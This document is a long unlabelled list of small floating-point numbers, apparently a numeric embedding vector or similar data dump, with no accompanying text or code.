0.004776539746671915, -0.00684487447142601, -0.013316203840076923, -0.01467895321547985, -0.0009061936289072037, 0.0027324159163981676, -0.020807866007089615, 0.0024263160303235054, -0.01557822898030281, 0.010493860580027103, 0.0069313435815274715, 0.010652963072061539, -0.007010894827544689, 0.0013125971890985966, -0.01542604435235262, 0.007277219090610743, -0.01083281822502613, 0.004980606026947498, -0.025345752015709877, -0.015135508961975574, -0.006415989249944687, 0.02340884879231453, 0.0004660671402234584, 0.02533191628754139, 0.007353311404585838, 0.020185289904475212, -0.020683350041508675, 0.015149343758821487, -0.008266422897577286, 0.0038668871857225895, -0.014582107774913311, -0.007304889149963856, 0.019465869292616844, 0.00037786891334690154, 0.02455715462565422, 0.028832174837589264, 0.029191885143518448, -0.008307927288115025, -0.000832695106510073, -0.01642216555774212, 0.02166563645005226, -0.0075815892778337, 0.004344195127487183, 0.013994120061397552, -0.010908911004662514, 0.0017916347132995725, 0.01660202071070671, -0.012181732803583145, -0.021596461534500122, 0.0036386095453053713, -0.008750648237764835, -0.015924105420708656, 0.002140968805179, -0.024031424894928932, -0.010251747444272041, 0.008273339830338955, 0.005253847688436508, -0.0038910985458642244, -0.016574351117014885, -0.028776835650205612, -0.016712700948119164, -0.006460953038185835, 0.025345752015709877, -0.02852780558168888, 0.00897200871258974, 0.01596560887992382, 0.009649924002587795, -0.0023761640768498182, 0.022329717874526978, 0.01783333718776703, 0.029800627380609512, 0.01052153017371893, 0.002787756035104394, -0.014402252621948719, 0.007408651523292065, -0.019659558311104774, 0.033895790576934814, 0.02256491221487522, 0.005201966501772404, 0.01426390279084444, -0.009034265764057636, 0.01234775222837925, -0.016145464032888412, -0.005762284621596336, 0.018649602308869362, 0.005157002713531256, 0.024986039847135544, -0.0050394050776958466, 0.019286014139652252, -0.011566074565052986, 0.009131111204624176, -0.03309335932135582, -0.0005157866980880499, 0.022039182484149933, -0.009809027425944805, -0.009470068849623203, 0.013288534246385098, 0.0027670033741742373, 0.014277737587690353, 0.003929144702851772, 0.008307927288115025, 0.001425871392711997, 0.007989722304046154, -0.015287693589925766, -0.017418285831809044, 0.02141660638153553, -0.022149862721562386, -0.038378335535526276, -0.018248386681079865, -0.0026857226621359587, 0.02462632954120636, 0.011656002141535282, -0.00814190786331892, 0.004565555602312088, 0.022800108417868614, 0.019770238548517227, 0.011469229124486446, 0.005599723197519779, 0.040121547877788544, -0.0065854680724442005, -0.0042715612798929214, 0.007436321582645178, 0.01993625983595848, -0.007671516854315996, -0.015481384471058846, -0.011157941073179245, -0.012160980142652988, 0.009636089205741882, -0.038184646517038345, 0.015052498318254948, 0.016048619523644447, 0.02944091707468033, -0.013350791297852993, -0.00652666948735714, 0.004537885542958975, -0.03586036339402199, -0.02044815570116043, -0.013440718874335289, 0.005094745196402073, -0.014526767656207085, -0.013281616382300854, -0.0028223434928804636, -0.012188649736344814, 0.0038945572450757027, 0.006301850080490112, -0.025733131915330887, -0.010376262478530407, 0.0017025717534124851, 0.0051742964424192905, 0.01433307770639658, 0.006063196342438459, 0.007318723946809769, 0.003908392507582903, -0.017874842509627342, 0.014222397468984127, -0.002097734482958913, -0.011330879293382168, -0.00994045939296484, -0.01776416227221489, -0.0018002815777435899, 0.0038945572450757027, 0.02461249567568302, 0.002140968805179, 0.02499987557530403, -0.009649924002587795, -0.00005712348865927197, 0.027988240122795105, -0.02545643039047718, -0.017279936000704765, -0.014927983283996582, -0.021568791940808296, -0.01192578487098217, -0.006837957073003054, -0.003610939485952258, 0.0013575610937550664, -0.001966301817446947, -0.014665118418633938, 0.0015166637022048235, -0.000026737790904007852, 0.005852212198078632, 0.012320082634687424, 0.0015434690285474062, -0.015924105420708656, -0.01686488650739193, 0.0034777773544192314, -0.00014656470739282668, 0.0026770757976919413, -0.003351532854139805, -0.013627491891384125, 0.006665019318461418, -0.01602094992995262, -0.009961212053894997, 0.0035901868250221014, 0.008965090848505497, -0.017487460747361183, 0.019784074276685715, 0.010742890648543835, -0.029966646805405617, -0.0098712844774127, -0.01442992314696312, 0.02096005156636238, -0.03782493621110916, -0.007782197091728449, 0.027033623307943344, -0.03663512319326401, 0.03007732704281807, -0.007830619812011719, -0.017528966069221497, 0.003808088367804885, 0.016878720372915268, 0.018801787868142128, 0.0017518589738756418, 0.00810732040554285, 0.0017129480838775635, -0.02872149460017681, 0.006215381436049938, 0.03251228854060173, -0.013738172128796577, 0.009497739374637604, 0.00689329719170928, -0.02078019641339779, 0.053956564515829086, 0.009283296763896942, -0.0392637774348259, 0.0016264792066067457, -0.018760282546281815, -0.049280330538749695, -0.009822862222790718, -0.015246188268065453, 0.002915729768574238, -0.002711663255468011, -0.01845591329038143, 0.004150505177676678, -0.027075128629803658, 0.0016359908040612936, 0.005620475858449936, -0.007059317547827959, 0.03829532861709595, 0.014914148487150669, -0.018248386681079865, 0.010016552172601223, 0.031765200197696686, 0.011988041922450066, -0.005215801298618317, -0.010507695376873016, -0.0011457123328000307, -0.035749685019254684, 0.004126293584704399, 0.02570546232163906, 0.0030644561629742384, -0.015024828724563122, 0.009850531816482544, -0.027614694088697433, 0.0012615806190297008, 0.006128912325948477, -0.025885317474603653, -0.0283341147005558, 0.027476344257593155, -0.027075128629803658, 0.0006096054567024112, 0.00625342782586813, -0.02455715462565422, -0.024833856150507927, -0.009898955002427101, -0.012949575670063496, -0.0068414160050451756, 0.0022689427714794874, -0.0057588256895542145, -0.014250067062675953, -0.008847493678331375, 0.053569186478853226, 0.00872297864407301, 0.024404969066381454, -0.01783333718776703, -0.013502976857125759, -0.010403933003544807, 0.002556019462645054, 0.00897892564535141, -0.02141660638153553, 0.025110555812716484, -0.038129307329654694, 0.040370579808950424, -0.0021375101059675217, -0.017086245119571686, 0.011144106276333332, 0.017030905932188034, -0.01924450881779194, 0.004728117026388645, -0.009262544102966785, -0.001233045943081379, -0.01808236725628376, 0.005862588528543711, 0.006972848437726498, 0.00198705424554646, 0.019009312614798546, 0.021084565669298172, 0.008750648237764835, 0.020724855363368988, 0.017653482034802437, -0.03353608027100563, 0.002801590831950307, -0.009843614883720875, -0.011116435751318932, 0.0050532398745417595, -0.0061047011986374855, -0.013233194127678871, -0.011164858937263489, 0.022288212552666664, 0.01134471409022808, -0.0005261629703454673, -0.007242631167173386, -0.011137188412249088, 0.023422684520483017, -0.016851050779223442, -0.0004535291518550366, -0.0001399714674334973, 0.022219037637114525, -0.027102798223495483, -0.024570990353822708, 0.021831657737493515, -0.009857449680566788, 0.005015193484723568, -0.005454455502331257, -0.002993551781401038, 0.002536996267735958, 0.011572991497814655, -0.015149343758821487, -0.02713046781718731, -0.023699384182691574, -0.03710551559925079, 0.005772660952061415, 0.021886996924877167, 0.01680954545736313, 0.03713318705558777, 0.0024937617126852274, 0.007014353759586811, -0.03071373701095581, 0.025304246693849564, -0.007062776014208794, 0.003977567423135042, 0.014886477962136269, -0.025553276762366295, -0.004911431111395359, 0.016186969354748726, 0.006979766301810741, 0.005866046994924545, -0.025746965780854225, -0.04634730517864227, 0.058771152049303055, -0.019853249192237854, 0.007138868793845177, -0.0011647355277091265, -0.031239468604326248, -0.0070800697430968285, -0.004427205305546522, -0.008681473322212696, -0.0027548978105187416, 0.03259529918432236, 0.03489191457629204, -0.02757318876683712, -0.01532919891178608, -0.029994316399097443, -0.022094521671533585, -0.032927341759204865, -0.00019898645405191928, -0.01776416227221489, -0.011144106276333332, -0.0016973837045952678, -0.0009753687190823257, -0.004949477501213551, -0.007789114490151405, 0.007256466429680586, 0.005855671130120754, -0.011137188412249088, 0.01442992314696312, 0.005720779299736023, -0.0008231835090555251, 0.0009866096079349518, -0.010611457750201225, 0.015439879149198532, 0.028181929141283035, -0.014028707519173622, 0.035611335188150406, -0.0032356646843254566, -0.0006329520256258547, 0.011739011853933334, -0.01686488650739193, -0.0011145835742354393, -0.009539243765175343, -0.007003977429121733, 0.03904241696000099, 0.012838895432651043, 0.01770882122218609, 0.029081204906105995, -0.0030765619594603777, -0.009511574171483517, 0.006177335046231747, 0.014568272978067398, 0.007173456251621246, 0.002628653310239315, 0.011711342260241508, -0.016200805082917213, 0.005558217875659466, -0.008985843509435654, 0.014277737587690353, 0.0010990191949531436, 0.01679570972919464, -0.00942164659500122, -0.01686488650739193, -0.003285816637799144, 0.010770561173558235, -0.01622847467660904, 0.008550040423870087, -0.002623465145006776, 0.005080909933894873, 0.0036005631554871798, -0.02993897721171379, -0.012914988212287426, -0.007498579099774361, -0.0042127626948058605, 0.020406650379300117, 0.032290928065776825, -0.00846011284738779, -0.010334758087992668, -0.0034276254009455442, -0.023007633164525032, -0.00948390457779169, -0.011531487107276917, 0.02231588214635849, -0.01589643396437168, -0.02115374058485031, -0.02136126533150673, -0.02083553560078144, -0.0004760110459756106, 0.025677790865302086, 0.019673394039273262, 0.011296291835606098, 0.01961805485188961, 0.012327000498771667, -0.014997158199548721, 0.0010021739872172475, -0.0008949526818469167, 0.0026545939035713673, -0.006388319190591574, 0.01584109477698803, -0.006308767944574356, -0.00426118541508913, 0.024972205981612206, 0.006087407469749451, -0.019645724445581436, 0.008467030711472034, -0.023312004283070564, -0.015924105420708656, -0.020890874788165092, -0.009034265764057636, 0.008487783372402191, -0.005260765086859465, 0.00477999821305275, -0.0011993229854851961, -0.0032062651589512825, -0.004952935967594385, 0.004039824940264225, -0.0050982036627829075, -0.0023156360257416964, -0.005347234196960926, 0.015204683877527714, 0.018137706443667412, -0.011877361685037613, 0.0030973143875598907, -0.016076289117336273, -0.006972848437726498, 0.006685771979391575, -0.009677594527602196, -0.013841934502124786, 0.004676235839724541, 0.0018573510460555553, 0.028361784294247627, -0.022730933502316475, -0.0009252167656086385, -0.006831039674580097, -0.004275020211935043, 0.0008396126213483512, -0.015619734302163124, 0.013973367400467396, 0.006146206520497799, -0.011780517175793648, -0.0021945794578641653, -0.008231835439801216, -0.030741408467292786, 0.010044222697615623, 0.011718259193003178, 0.004088247660547495, -0.01769498735666275, -0.0035936457570642233, 0.013579069636762142, -0.003763124579563737, -0.016947895288467407, -0.009629172272980213, -0.0075608366169035435, 0.002102922648191452, -0.016685031354427338, 0.010106479749083519, 0.03372977301478386, 0.03547298535704613, -0.002374434843659401, 0.014831137843430042, 0.00009381870768265799, -0.009193369187414646, 0.0066753956489264965, -0.023768559098243713, 0.013911109417676926, 0.0021963089238852262, -0.0037769596092402935, 0.0201437845826149, 0.007602341938763857, -0.0010073621524497867, 0.023616373538970947, -0.003379202913492918, -0.00086339155677706, -0.006768782157450914, 0.018774118274450302, 0.01526002399623394, -0.01179435197263956, -0.011656002141535282, -0.016242310404777527, -0.014637447893619537, 0.011026508174836636, -0.008134989999234676, -0.014526767656207085, 0.003351532854139805, 0.01822071708738804, 0.01860809698700905, -0.012977246195077896, 0.015550559386610985, 0.002780838403850794, -0.005101662594825029, -0.030935097485780716, 0.0042957728728652, 0.0053991153836250305, 0.006433282978832722, 0.007332559209316969, 0.007962052710354328, 0.010597622953355312, -0.011884279549121857, 0.00034630775917321444, -0.0201437845826149, 0.0010903723305091262, -0.03162685036659241, -0.0029779875185340643, -0.010403933003544807, 0.0011759764747694135, 0.003697408363223076, 0.005001358687877655, -0.004679694306105375, 0.005592805799096823, -0.01346838939934969, -0.021471945568919182, 0.006564715411514044, 0.0043787830509245396, -0.02237122319638729, 0.0128873186185956, -0.009345553815364838, -0.0016014032298699021, 0.002220520284026861, -0.00620500510558486, 0.01279047317802906, -0.005917928647249937, -0.0018677272601053119, -0.008536205627024174, 0.017279936000704765, 0.02302146889269352, 0.004997899755835533, 0.0010687550529837608, -0.014077129773795605, -0.01692022569477558, 0.020683350041508675, -0.00846011284738779, 0.007277219090610743, -0.025691626593470573, -0.02365787886083126, -0.0032235588878393173, 0.002689181361347437, -0.015481384471058846, -0.006896756123751402, -0.010729055851697922, 0.01032092235982418, 0.0197425689548254, 0.009885119274258614, -0.004219680093228817, 0.019784074276685715, -0.011739011853933334, 0.01326778158545494, -0.027863724157214165, -0.00810732040554285, -0.016906389966607094, -0.006460953038185835, 0.0022966128308326006, -0.0008672826224938035, -0.00771302217617631, 0.004537885542958975, 0.019216839224100113, 0.01378659438341856, -0.018483582884073257, 0.005769202020019293, 0.009193369187414646, -0.021817822009325027, -0.019133828580379486, 0.004869925789535046, -0.004402994178235531, 0.01968722976744175, 0.02238505706191063, -0.01231316477060318, -0.021139906719326973, 0.0012615806190297008, -0.008294092491269112, -0.010023470036685467, 0.011988041922450066, 0.01327469851821661, 0.0011630060616880655, 0.0007721668807789683, 0.00801739189773798, 0.000524001254234463, -0.0008478271192871034, 0.016173135489225388, -0.00172678311355412, -0.0020666057243943214, 0.0049633122980594635, 0.009234873577952385, 0.010701385326683521, 0.000010193867638008669, 0.014042542316019535, 0.017556635662913322, 0.021375101059675217, -0.0009727746364660561, -0.028500134125351906, -0.04219680279493332, -0.008965090848505497, 0.011718259193003178, -0.022080687806010246, 0.006568174343556166, -0.016325319185853004, -0.005240012891590595, 0.0011578180128708482, -0.0004033772274851799, -0.032152578234672546, 0.0005149220232851803, 0.009712181985378265, -0.0182068832218647, 0.02129209041595459, 0.004790374543517828, 0.01956271380186081, 0.0005815030308440328, 0.022481903433799744, 0.011988041922450066, -0.015107838436961174, 0.020475825294852257, -0.01234775222837925, 0.002995281247422099, 0.02540109120309353, 0.002628653310239315, -0.014526767656207085, 0.006910590920597315, 0.0037285371217876673, -0.010459273122251034, 0.012223237194120884, 0.0034777773544192314, 0.022537242621183395, -0.01584109477698803, -0.02423894964158535, -0.022094521671533585, 0.01577191986143589, 0.014789633452892303, 0.024861525744199753, -0.014997158199548721, -0.00002279265027027577, -0.01199495978653431, 0.009857449680566788, -0.027587024495005608, -0.011213281191885471, -0.005859129596501589, 0.02039281465113163, -0.007754527032375336, -0.0016463670181110501, -0.008321763016283512, 0.017916347831487656, 0.0036662796046584845, 0.00019304172019474208, 0.008833657950162888, -0.01674037054181099, 0.02699211798608303, -0.018953973427414894, 0.015246188268065453, -0.015301528386771679, -0.0037562071811407804, 0.015398373827338219, -0.021624131128191948, -0.007263383828103542, 0.008155742660164833, 0.0012373693753033876, -0.007789114490151405, 0.0010877782478928566, 0.033563751727342606, 0.013938779942691326, 0.019521208480000496, 0.013509893789887428, 0.025055216625332832, -0.00022546754917129874, 0.010735972784459591, -0.007802949752658606, -0.007304889149963856, -0.009829779155552387, 0.03085208870470524, 0.012493019923567772, 0.0008154013194143772, -0.003259875811636448, 0.007104281336069107, -0.0000579341322008986, -0.024986039847135544, 0.012831978499889374, -0.0041366699151694775, 0.007540084421634674, -0.0050082760863006115, -0.016145464032888412, 0.01096425112336874, 0.040038540959358215, -0.001872915425337851, -0.0004803345073014498, 0.00047384932986460626, 0.005527089349925518, -0.011268621310591698, 0.002927835565060377, -0.011621414683759212, 0.005046322476118803, 0.00095807493198663, -0.03270598128437996, -0.013537564314901829, 0.010528448037803173, -0.005392197985202074, 0.0029191887006163597, -0.005222718697041273, 0.010507695376873016, -0.037437554448843, -0.019784074276685715, 0.011967289261519909, 0.009034265764057636, 0.009822862222790718, 0.0031215257477015257, -0.003887639846652746, -0.004174716304987669, 0.0058798822574317455, -0.009947377257049084, 0.0038668871857225895, -0.016961731016635895, 0.020987721160054207, -0.005686191841959953, 0.012880400754511356, -0.0018781035905703902, 0.00913802906870842, 0.013606739230453968, -0.002600983250886202, -0.012202484533190727, -0.010362427681684494, 0.026175852864980698, -0.0041677989065647125, 0.004534426610916853, -0.013585986569523811, -0.003998320084065199, -0.011400054208934307, 0.007498579099774361, -0.01802702806890011, -0.005302270408719778, 0.0006351137417368591, 0.0033238627947866917, 0.0028673072811216116, -0.01885712891817093, -0.01929984800517559, -0.012838895432651043, -0.014582107774913311, -0.004434123169630766, -0.005506336688995361, -0.026065172627568245, 0.008134989999234676, 0.014665118418633938, -0.0015279046492651105, -0.007740692235529423, -0.025995997712016106, -0.0013091384898871183, 0.002462632954120636, -0.0011483064154163003, -0.02455715462565422, 0.005841835867613554, -0.008231835439801216, -0.026826098561286926, 0.020365145057439804, 0.01372433640062809, -0.012451515533030033, 0.006066654808819294, -0.024404969066381454, -0.008100402541458607, -0.004219680093228817, 0.005807248409837484, -0.003963732160627842, 0.012133309617638588, -0.008058897219598293, 0.011835857294499874, -0.008916668593883514, -0.01000271737575531, 0.014983323402702808, -0.014969488605856895, -0.015370704233646393, 0.024515649303793907, -0.004814586136490107, -0.008190330117940903, 0.027545519173145294, 0.007768361829221249, 0.00015791374607942998, -0.018801787868142128, 0.002896706573665142, -0.01884329319000244, -0.009857449680566788, 0.017681151628494263, -0.012022629380226135, -0.01589643396437168, 0.008169577457010746, -0.004645106848329306, 0.006457494106143713, 0.021181410178542137, 0.004285396542400122, 0.004192010033875704, -0.0034103316720575094, -0.015343033708631992, 0.02450181543827057, -0.00407095393165946, 0.029717616736888885, 0.029136545956134796, -0.009961212053894997, 0.003628233214840293, 0.0246955044567585, -0.007830619812011719, 0.0095876669511199, -0.007318723946809769, 0.001316920737735927, 0.0010220619151368737, 0.021319761872291565, 0.0011621414450928569, 0.01903698407113552, 0.00287768361158669, -0.003282357705757022, 0.016463670879602432, 0.006291473750025034, -0.007782197091728449, 0.028112754225730896, 0.003880722215399146, -0.011005756445229053, 0.01346838939934969, 0.0009658571216277778, -0.030547717586159706, -0.019507374614477158, -0.0018141166074201465, 0.011503816582262516, 0.019203003495931625, 0.005544383078813553, -0.0009286755230277777, 0.006481705233454704, 0.015592063777148724, -0.005430244375020266, 0.024003755301237106, -0.009304048493504524, -0.008619215339422226, -0.008570793084800243, 0.001514069619588554, -0.00028750894125550985, 0.00849470030516386, -0.009497739374637604, -0.037741925567388535, 0.0018781035905703902, 0.014388417825102806, 0.0007237443351186812, 0.007477826904505491, 0.003374014748260379, -0.002535266801714897, 0.000019725708625628613, -0.003531388007104397, -0.0162146408110857, -0.019452033564448357, -0.029579266905784607, -0.0024280454963445663, -0.0058798822574317455, 0.00716653885319829, 0.012050299905240536, -0.001554710092023015, -0.003970650024712086, -0.009463151916861534, -0.005554759409278631, -0.0303263571113348, 0.0038461347576230764, -0.02591298706829548, 0.007505496498197317, 0.02494453638792038, -0.03325938060879707, -0.009435481391847134, 0.011337796226143837, -0.007138868793845177, 0.02462632954120636, -0.00003783012289204635, 0.0029122710693627596, -0.019922424107789993, 0.0008305333903990686, 0.0007146651041693985, 0.005921387113630772, 0.00917261652648449, -0.0022758604027330875, -0.0024730092845857143, -0.02988363616168499, 0.0032287470530718565, 0.005392197985202074, 0.003901474876329303, -0.016007114201784134, -0.026563232764601707, 0.006502457894384861, -0.024764681234955788, 0.00360748078674078, -0.026507891714572906, -0.009636089205741882, -0.013122513890266418, -0.0002557316329330206, -0.0019974305760115385, 0.02808508463203907, 0.009269461035728455, -0.008570793084800243, -0.014042542316019535, -0.017736492678523064, 0.02847246453166008, -0.015924105420708656, 0.022620253264904022, -0.010230994783341885, 0.006658101920038462, -0.002165180165320635, -0.015315364114940166, -0.011745929718017578, 0.014789633452892303, -0.026563232764601707, -0.002511055674403906, -0.0009191639255732298, -0.0003223126695957035, 0.011628331616520882, -0.00410554138943553, 0.03558366373181343, 0.0007604935672134161, 0.01834523305296898, -0.0076369293965399265, 0.015495219267904758, -0.008224917575716972, 0.007031647488474846, 0.01430540718138218, -0.001496775890700519, -0.01795785129070282, 0.010825900360941887, -0.0008642562315799296, -0.0012702274834737182, -0.012534525245428085, 0.004396076779812574, 0.0007613583002239466, 0.005942139774560928, -0.010715221054852009, -0.00397410849109292, -0.006177335046231747, -0.031184127554297447, 0.0036005631554871798, 0.01320552360266447, 0.0038634284865111113, 0.008155742660164833, -0.006492081563919783, 0.0187187772244215, 0.010431602597236633, 0.01340613141655922, -0.004496380686759949, -0.00010581625974737108, 0.004088247660547495, -0.002422857331112027, 0.006993601098656654, -0.004541344475001097, -0.038821056485176086, 0.024598659947514534, -0.0052642240189015865, -0.0022896951995790005, -0.018110036849975586, 0.010957333259284496, 0.007014353759586811, 0.025553276762366295, -0.011137188412249088, -0.008301010355353355, -0.011185611598193645, -0.025484101846814156, 0.025926820933818817, 0.017847171053290367, 0.0227032620459795, -0.01484497357159853, 0.0105837881565094, -0.009186451323330402, -0.020821699872612953, -0.023312004283070564, 0.005298811476677656, 0.014194727875292301, 0.010113397613167763, -0.00894433818757534, -0.03289967030286789, 0.0019126910483464599, -0.00859846267849207, 0.014319242909550667, 0.0051881312392652035, -0.014063294976949692, -0.012167897075414658, 0.012077969498932362, -0.019825579598546028, -0.004088247660547495, -0.001212293398566544, -0.015550559386610985, 0.0071250335313379765, -0.008024309761822224, -0.026646243408322334, 0.000027778120056609623, 0.010493860580027103, 0.0023917285725474358, -0.0013636138755828142, 0.004613978322595358, -0.003486424218863249, 0.01371741946786642, 0.004956394899636507, 0.005077451467514038, -0.010735972784459591, -0.017916347831487656, -0.008342515677213669, -0.010729055851697922, -0.004530968144536018, -0.021707141771912575, 0.0038184646982699633, 0.01833139732480049, 0.012721298262476921, -0.027587024495005608, -0.013350791297852993, 0.007159621454775333, 0.017930181697010994, 0.033563751727342606, -0.02244039811193943, -0.0021478864364326, -0.019576549530029297, 0.012098722159862518, -0.020406650379300117, 0.011420806869864464, -0.009373224340379238, 0.011061095632612705, -0.00962225440889597, 0.01013415027409792, -0.02744867280125618, -0.014035624451935291, -0.003925686236470938, -0.009670676663517952, -0.009892037138342857, -0.018940137699246407, 0.00007420108886435628, -0.017279936000704765, 0.0108674056828022, -0.016325319185853004, 0.007906712591648102, -0.010528448037803173, -0.000689589127432555, 0.00021249720884952694, 0.024778515100479126, -0.023906908929347992, 0.006412530317902565, -0.022288212552666664, -0.02526274137198925, 0.02520740032196045, 0.018511252477765083, -0.011462311260402203, -0.004306149203330278, -0.016851050779223442, -0.0009589396067894995, 0.0035002592485398054, 0.0020199124701321125, 0.00852237083017826, -0.002651135204359889, -0.015287693589925766, -0.007374064065515995, 0.03500259295105934, -0.0070662349462509155, -0.007699186913669109, 0.009566914290189743, -0.014132469892501831, -0.012721298262476921, 0.0011016132775694132, -0.009546161629259586, 0.004946018569171429, 0.0035625167656689882, 0.008930503390729427, -0.014582107774913311, 0.01032092235982418, 0.027919065207242966, 0.007463991641998291, 0.016961731016635895, 0.007844454608857632, -0.010563035495579243, 0.006021691020578146, 0.014194727875292301, -0.002334659220650792, -0.001564221573062241, 0.030437037348747253, -0.011206363327801228, -0.000014132253454590682, 0.013122513890266418, 0.009802109561860561, 0.006263804156333208, 0.028417125344276428, 0.0028154258616268635, 0.0042265974916517735, 0.0007881636265665293, -0.005592805799096823, -0.0012624453520402312, 0.0022637546062469482, -0.004354571457952261, -0.005537465680390596, 0.012430762872099876, 0.0009995800210162997, 0.0007470909040421247, -0.005091286264359951, 0.004838797263801098, -0.0000024589580789324827, 0.0241836104542017, 0.025428760796785355, -0.020406650379300117, -0.016463670879602432, 0.013973367400467396, 0.015744248405098915, 0.006111618597060442, -0.0383506678044796, -0.0061358301900327206, 0.0025421844329684973, 0.04521283507347107, 0.00031280110124498606, 0.0011457123328000307, -0.0007881636265665293, -0.001938631758093834, -0.0012365046422928572, -0.01776416227221489, 0.019286014139652252, 0.0006792128551751375, -0.01092966366559267, 0.009463151916861534, 0.010798230767250061, -0.003766583278775215, 0.018386738374829292, 0.001017738482914865, 0.013046421110630035, 0.006312226410955191, 0.010120314545929432, 0.01465128269046545, 0.003898015944287181, -0.0026130888145416975, 0.008840575814247131, -0.013461471535265446, -0.024737009778618813, -0.010625293478369713, -0.023381179198622704, -0.0058349184691905975, -0.014194727875292301, -0.010846653021872044, 0.0023415766190737486, 0.012797391042113304, 0.0323185995221138, -0.006381401792168617, -0.007297971285879612, -0.0011171776568517089, 0.00911035854369402, 0.008515452966094017, -0.011538404040038586, 0.02462632954120636, 0.01007189229130745, -0.013385378755629063, -0.0024263160303235054, 0.006243051495403051, -0.003680114634335041, 0.006488623097538948, 0.0015391455963253975, -0.005987103562802076, -0.0015694097382947803, 0.01852508820593357, 0.013613657094538212, 0.009165698662400246, 0.02148578129708767, -0.016698865219950676, 0.004243891686201096, -0.0025006793439388275, -0.008245670236647129, 0.002396916737779975, -0.00317340693436563, -0.003176865866407752, 0.003349803388118744, -0.014775797724723816, 0.004914889577776194, -0.0031197962816804647, 0.016173135489225388, 0.01923067308962345, -0.015854928642511368, -0.005551300477236509, -0.00852928776293993, -0.008840575814247131, 0.009732934646308422, 0.010652963072061539, -0.0005084368749521673, 0.014775797724723816, 0.015301528386771679, 0.008999678306281567, -0.009947377257049084, 0.016906389966607094, 0.004811127204447985, -0.0002103354927385226, 0.01109568402171135, 0.0030264100059866905, -0.00006858060805825517, 0.0019317142432555556, 0.006824122276157141, -0.029025865718722343, -0.010334758087992668, -0.017985522747039795, -0.013198606669902802, -0.006256886292248964, -0.02000543475151062, 0.013710501603782177, 0.020033104345202446, -0.005506336688995361, 0.040232229977846146, 0.00016915469313971698, 0.00997504685074091, 0.0019196085631847382, 0.01467895321547985, -0.011967289261519909, -0.004084788728505373, -0.01013415027409792, 0.00474541075527668, -0.022675592452287674, 0.006779158487915993, -0.025677790865302086, -0.011137188412249088, -0.0017466709250584245, -0.0032564171124249697, 0.005523630417883396, 0.0151908490806818, -0.0007406057557091117, 0.007042023818939924, 0.004385700449347496, 0.018262222409248352, -0.010687550529837608, -0.018691107630729675, -0.0207110196352005, 0.00849470030516386, 0.007242631167173386, 0.004306149203330278, -0.01426390279084444, -0.006685771979391575, -0.004524050746113062, 0.0009442399023100734, 0.031765200197696686, -0.00011446314601926133, 0.011227115988731384, 0.018372902646660805, -0.004129752516746521, -0.004420287907123566, 0.0015728684375062585, 0.000757034809794277, 0.0030315981712192297, 0.019714899361133575, 0.008916668593883514, 0.003835758427157998, 0.013094843365252018, 0.01956271380186081, 0.01340613141655922, -0.011019591242074966, 0.006052820011973381, 0.0036455269437283278, -0.003887639846652746, -0.019797910004854202, -0.007318723946809769, -0.0034362722653895617, 0.006025149952620268, 0.00493564223870635, -0.00894433818757534, 0.005955975037068129, 0.021568791940808296, 0.01802702806890011, -0.018193047493696213, 0.00456901453435421, 0.006066654808819294, 0.01532919891178608, -0.00046001432929188013, -0.0030298687051981688, -0.0015157990856096148, -0.01433307770639658, -0.008847493678331375, -0.028444794937968254, 0.013489141128957272, 0.029219556599855423, -0.007097363937646151, -0.020932380110025406, 0.02526274137198925, -0.01532919891178608, 0.014512932859361172, 0.005776119418442249, 0.00397410849109292, 0.01629764959216118, 0.021582625806331635, -0.008750648237764835, -0.01003730483353138, -0.026756923645734787, -0.0022274376824498177, -0.0021496156696230173, 0.001223534345626831, -0.029468586668372154, 0.01052153017371893, -0.01465128269046545, 0.008294092491269112, -0.0003744101559277624, -0.02847246453166008, 0.012237072922289371, 0.002896706573665142, 0.0005395656335167587, -0.017777996137738228, 0.015121673233807087, 0.0052192602306604385, 0.012368504889309406, 0.006758405826985836, -0.0322079211473465, 0.0031664895359426737, 0.014983323402702808, 0.010085727088153362, 0.012493019923567772, 0.0016480963677167892, 0.0033031103666871786, -0.009034265764057636, -0.005828001070767641, 0.011801269836723804, 0.008217999711632729, -0.005150084849447012, 0.025428760796785355, 0.003787335939705372, -0.01154532190412283, -0.0050532398745417595, -0.0008698767051100731, 0.006869086064398289, 0.007346394006162882, 0.008453194983303547, 0.004683153238147497, -0.001469105831347406, -0.02866615541279316, -0.009684511460363865, -0.004492921754717827, 0.025553276762366295, 0.0029295647982507944, -0.014582107774913311, -0.035998713225126266, 0.006699606776237488, 0.02628653310239315, -0.006288015283644199, 0.010224077850580215, 0.011192528530955315, -0.0031803245656192303, -0.037354547530412674, -0.015177013352513313, -0.010763643309473991, 0.003384391078725457, -0.015080168843269348, 0.011330879293382168, 0.011026508174836636, 0.0038011709693819284, 0.003998320084065199, -0.002447068691253662, -0.013212441466748714, -0.00913802906870842, 0.02699211798608303, -0.0006554339197464287, -0.0037735009100288153, -0.021126070991158485, 0.035362303256988525, 0.009297131560742855, -0.010466190055012703, -0.01988091878592968, 0.026784593239426613, 0.004544802941381931, -0.016366824507713318, 0.012520690448582172, -0.026438716799020767, 0.008577710948884487, -0.013994120061397552, 0.0046624005772173405, -0.004845714662224054, 0.011905032210052013, 0.007913629524409771, 0.012831978499889374, 0.0025940656196326017, 0.017224596813321114, 0.0038253820966929197, 0.004849173594266176, 0.0055789705365896225, 0.016906389966607094, 0.0035798107273876667, 0.015218518674373627, 0.01840057224035263, 0.006094324868172407, 0.010189490392804146, 0.015744248405098915, 0.0036455269437283278, 0.03563900291919708, -0.022232871502637863, -0.009304048493504524, 0.013136348687112331, 0.005205424968153238, -0.00237270537763834, -0.004461792763322592, -0.004824962001293898, 0.022924622520804405, 0.00945623405277729, 0.012126392684876919, -0.003673197003081441, -0.007609259337186813, -0.025871481746435165, 0.01109568402171135, -0.0016619313973933458, -0.023062974214553833, -0.013032586313784122, -0.005184672772884369, 0.007892876863479614, -0.000709044630639255, 0.008923585526645184, 0.004814586136490107, 0.01038318034261465, -0.02847246453166008, -0.03096276894211769, 0.015398373827338219, -0.005502878222614527, 0.009566914290189743, 0.014831137843430042, 0.0207663606852293, 0.015605899505317211, -0.0035071768797934055, 0.014540602453052998, -0.0000061744167396682315, 0.002355411648750305, -0.007872124202549458, 0.02078019641339779, -0.02321515791118145, -0.016781875863671303, -0.013627491891384125, -0.006460953038185835, -0.013938779942691326, -0.0035694343969225883, -0.010300169698894024, 0.0017259183805435896, -0.00019704090664163232, 0.0003806791501119733, -0.0037285371217876673, -0.03204189985990524, 0.016560515388846397, -0.012154062278568745, -0.013177854008972645, -0.00798280443996191, 0.01667119562625885, -0.020572669804096222, 0.0008309656986966729, 0.021707141771912575, -0.010106479749083519, 0.001652419799938798, -0.014007954858243465, -0.02277243882417679, 